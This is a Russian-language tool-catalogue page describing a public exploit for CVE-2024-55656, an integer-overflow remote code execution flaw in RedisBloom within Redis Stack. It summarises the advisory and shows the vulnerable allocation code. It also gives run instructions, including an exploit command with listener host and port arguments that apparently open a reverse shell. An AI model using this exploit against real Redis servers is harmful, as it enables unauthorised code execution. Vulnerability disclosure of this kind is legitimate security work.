Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
redis-stack-CVE-2024-55656 | Kitploit
Инструменты/GitHubGitHub/rick2600/redis-stack-cve-2024-55656
Криминалистика памятиАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеБезопасность Баз ДанныхЭксплуатация Бинарных Файлов
GitHubrick2600/redis-stack-cve-2024-55656

redis-stack-CVE-2024-55656

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-55656 - Redis Stack - RedisBloom: уязвимость удаленного выполнения кода из-за целочисленного переполнения

  • Название: Redis Stack RedisBloom: уязвимость удаленного выполнения кода из-за целочисленного переполнения
  • ZDI: ZDI-25-009
  • CVE: CVE-2024-55656
  • Авторы: rick2600 and gqsilva
  • CVSS: 8.8 (HIGH)
  • Затронутая версия: RedisBloom v2.6.12, поставляемый с Redis Stack 7.2.0-v10

Анализ (краткая версия)

В RedisBloom (https://github.com/RedisBloom/RedisBloom), модуле, используемом в redis (https://redis.io/docs/latest/develop/data-types/probabilistic/bloom-filter/), существует уязвимость целочисленного переполнения. Эта уязвимость позволяет атакующему (redis-клиенту, знающему пароль) из-за циклического переполнения (wraparound) выделить в куче памяти меньше, чем требуется. После этого возможно выполнять чтение и запись за пределами выделенной памяти, что приводит к утечке информации и внеграничной записи (OOB write).

Целочисленное переполнение находится в команде CMS.INITBYDIM, которая инициализирует Count-Min Sketch с размерами, заданными пользователем. Она принимает два значения (width и depth) и использует их для выделения памяти в NewCMSketch().

Файл: src/cms.c

root@kitploit:~
CMSketch *NewCMSketch(size_t width, size_t depth) {
    assert(width > 0);
    assert(depth > 0);

    CMSketch *cms = CMS_CALLOC(1, sizeof(CMSketch));

    cms->width = width;
    cms->depth = depth;
    cms->counter = 0;
    cms->array = CMS_CALLOC(width * depth, sizeof(uint32_t));

    return cms;
}

Внеграничное чтение (OOB read) достигается с помощью команды CMS.QUERY, реализованной в CMS_Query().

Внеграничная запись (OOB write) достигается с помощью команды CMS.INCRBY, реализованной в CMS_IncrBy().

Полный анализ см. в рекомендации по безопасности

Эксплойт

  1. Запустите redis-stack

docker run -p 6379:6379 --name redis-stack redis/redis-stack:7.2.0-v10

  1. Запустите эксплойт

python exploit.py --host 172.17.0.2 --port 6379 --lhost 172.17.0.1 --lport 4444

Ссылки

  1. https://www.zerodayinitiative.com/advisories/ZDI-25-009/
  2. https://github.com/RedisBloom/RedisBloom/security/advisories/GHSA-x5rx-rmq3-ff3h
  3. https://redis.io/blog/security-advisory-cve-2024-46981-cve-2024-51737-cve-2024-51480-cve-2024-55656/
Скачать инструмент